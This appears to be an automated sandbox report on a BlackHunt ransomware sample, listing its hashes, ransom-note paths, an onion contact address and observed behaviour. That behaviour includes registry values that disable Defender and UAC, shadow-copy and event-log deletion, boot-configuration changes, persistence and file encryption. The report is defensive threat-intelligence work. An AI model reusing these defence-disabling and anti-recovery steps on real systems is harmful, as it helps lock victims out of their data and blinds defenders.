Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
19/01/2024, 01:19
Static task
static1
Behavioral task
behavioral1
Sample
eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe
Resource
win10v2004-20231215-en
General
-
Target
eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe
-
Size
707KB
-
MD5
b16b5958953587b1002a71398673642a
-
SHA1
e53518abd22807e08e361a28f63085b1d789d9b7
-
SHA256
eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb
-
SHA512
fcad6fb2d47b0db513f985b53f0e178eb537eeabaa78bc172469a455bfbdc2b60f4fc23afe132675630901b9d9f70e1eaa52f9ff7dbd33a2c8ecde5e3f62df88
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1T8Gvnh:6uaTmkZJ+naie5OTamgEoKxLW64h
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 812 fsutil.exe 3396 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 1848 wevtutil.exe 2616 wevtutil.exe 3164 wevtutil.exe 3100 wevtutil.exe 956 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 856 bcdedit.exe 2012 bcdedit.exe 3424 bcdedit.exe 608 bcdedit.exe -
Renames multiple (2911) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2240 wbadmin.exe 2904 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 204 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Y: eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened (read-only) \??\G: eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\N: eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened (read-only) \??\E: eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened (read-only) \??\I: eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened (read-only) \??\L: eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened (read-only) \??\X: eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened (read-only) \??\R: eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened (read-only) \??\O: eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\T: eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened (read-only) \??\A: eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened (read-only) \??\H: eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened (read-only) \??\Q: eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened (read-only) \??\U: eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened (read-only) \??\S: eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened (read-only) \??\P: eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened (read-only) \??\V: eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened (read-only) \??\J: eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened (read-only) \??\K: eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened (read-only) \??\Z: eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened (read-only) \??\B: eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened (read-only) \??\W: eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened (read-only) \??\M: eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: fsutil.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\colorcycle.png eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\#BlackHunt_Private.key eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File created C:\Program Files\Java\jre7\lib\zi\America\Indiana\#BlackHunt_ReadMe.hta eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\7-Zip\Lang\pt.txt eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\Bear_Formatted_MATTE2_PAL.wmv eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\#BlackHunt_ReadMe.txt eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File created C:\Program Files\Java\jre7\lib\#BlackHunt_Private.key eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvmstat.jar eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Salta eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\#BlackHunt_Private.key eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\#BlackHunt_ReadMe.txt eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\#BlackHunt_ReadMe.hta eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\#BlackHunt_Private.key eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\jamendo.luac eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationLeft_SelectionSubpicture.png eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_ja_4.4.0.v20140623020002.jar eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring.xml eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application.xml eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\Java\jre7\lib\calendars.properties eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\#BlackHunt_ReadMe.hta eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\El_Salvador eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Hermosillo eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Kwajalein eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File created C:\Program Files\DVD Maker\de-DE\#BlackHunt_ReadMe.txt eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.console_1.1.0.v20140131-1639.jar eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_ja_4.4.0.v20140623020002.jar eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_zh_CN.jar eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\#BlackHunt_ReadMe.hta eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\access-bridge-64.jar eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\#BlackHunt_Private.key eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-ui.jar eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Tijuana eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\vlc.mo eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_browse.html eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\#BlackHunt_ReadMe.hta eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Notes_loop_PAL.wmv eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\#BlackHunt_ReadMe.txt eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui_5.5.0.165303.jar eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-execution_zh_CN.jar eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\vlc.mo eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\#BlackHunt_Private.key eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationRight_ButtonGraphic.png eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Noumea eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+5 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_widescreen_Thumbnail.bmp eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_ja.jar eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\00_musicbrainz.luac eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\#BlackHunt_ReadMe.hta eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\#BlackHunt_ReadMe.hta eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File created C:\Program Files\VideoLAN\VLC\locale\km\#BlackHunt_Private.key eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_it.jar eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\1047x576black.png eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-windows.xml eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File created C:\Program Files\Java\jre7\lib\zi\America\#BlackHunt_Private.key eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\.lastModified eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\La_Paz eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Volgograd eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File created C:\Program Files\VideoLAN\VLC\plugins\audio_mixer\#BlackHunt_ReadMe.hta eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File created C:\Program Files\DVD Maker\es-ES\#BlackHunt_ReadMe.txt eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\#BlackHunt_Private.key eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\#BlackHunt_Private.key eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\license.html eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2784 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2668 vssadmin.exe 1612 vssadmin.exe 580 vssadmin.exe 2952 vssadmin.exe 108 vssadmin.exe 1656 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 3376 taskkill.exe -
Modifies registry class 10 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon vdsldr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 vdsldr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon vdsldr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" vdsldr.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3952 PING.EXE -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe Token: SeRestorePrivilege 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe Token: SeBackupPrivilege 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe Token: SeTakeOwnershipPrivilege 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe Token: SeAuditPrivilege 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe Token: SeSecurityPrivilege 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe Token: SeIncBasePriorityPrivilege 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe Token: SeBackupPrivilege 644 vssvc.exe Token: SeRestorePrivilege 644 vssvc.exe Token: SeAuditPrivilege 644 vssvc.exe Token: SeBackupPrivilege 1616 wbengine.exe Token: SeRestorePrivilege 1616 wbengine.exe Token: SeSecurityPrivilege 1616 wbengine.exe Token: SeSecurityPrivilege 1848 wevtutil.exe Token: SeBackupPrivilege 1848 wevtutil.exe Token: SeSecurityPrivilege 2616 wevtutil.exe Token: SeBackupPrivilege 2616 wevtutil.exe Token: SeSecurityPrivilege 3164 wevtutil.exe Token: SeBackupPrivilege 3164 wevtutil.exe Token: SeSecurityPrivilege 956 wevtutil.exe Token: SeSecurityPrivilege 3100 wevtutil.exe Token: SeBackupPrivilege 956 wevtutil.exe Token: SeBackupPrivilege 3100 wevtutil.exe Token: SeDebugPrivilege 3376 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1108 wrote to memory of 2028 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 29 PID 1108 wrote to memory of 2028 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 29 PID 1108 wrote to memory of 2028 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 29 PID 1108 wrote to memory of 2028 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 29 PID 1108 wrote to memory of 1736 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 31 PID 1108 wrote to memory of 1736 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 31 PID 1108 wrote to memory of 1736 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 31 PID 1108 wrote to memory of 1736 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 31 PID 1108 wrote to memory of 2612 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 33 PID 1108 wrote to memory of 2612 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 33 PID 1108 wrote to memory of 2612 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 33 PID 1108 wrote to memory of 2612 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 33 PID 2028 wrote to memory of 2660 2028 cmd.exe 34 PID 2028 wrote to memory of 2660 2028 cmd.exe 34 PID 2028 wrote to memory of 2660 2028 cmd.exe 34 PID 1108 wrote to memory of 2696 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 36 PID 1108 wrote to memory of 2696 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 36 PID 1108 wrote to memory of 2696 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 36 PID 1108 wrote to memory of 2696 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 36 PID 1736 wrote to memory of 2940 1736 cmd.exe 38 PID 1736 wrote to memory of 2940 1736 cmd.exe 38 PID 1736 wrote to memory of 2940 1736 cmd.exe 38 PID 1108 wrote to memory of 2664 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 39 PID 1108 wrote to memory of 2664 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 39 PID 1108 wrote to memory of 2664 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 39 PID 1108 wrote to memory of 2664 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 39 PID 1108 wrote to memory of 1420 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 41 PID 1108 wrote to memory of 1420 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 41 PID 1108 wrote to memory of 1420 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 41 PID 1108 wrote to memory of 1420 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 41 PID 1108 wrote to memory of 2788 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 42 PID 1108 wrote to memory of 2788 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 42 PID 1108 wrote to memory of 2788 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 42 PID 1108 wrote to memory of 2788 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 42 PID 2612 wrote to memory of 1184 2612 cmd.exe 43 PID 2612 wrote to memory of 1184 2612 cmd.exe 43 PID 2612 wrote to memory of 1184 2612 cmd.exe 43 PID 1108 wrote to memory of 2804 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 45 PID 1108 wrote to memory of 2804 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 45 PID 1108 wrote to memory of 2804 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 45 PID 1108 wrote to memory of 2804 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 45 PID 2696 wrote to memory of 2876 2696 cmd.exe 153 PID 2696 wrote to memory of 2876 2696 cmd.exe 153 PID 2696 wrote to memory of 2876 2696 cmd.exe 153 PID 1108 wrote to memory of 2840 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 47 PID 1108 wrote to memory of 2840 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 47 PID 1108 wrote to memory of 2840 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 47 PID 1108 wrote to memory of 2840 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 47 PID 1108 wrote to memory of 2632 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 49 PID 1108 wrote to memory of 2632 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 49 PID 1108 wrote to memory of 2632 1108 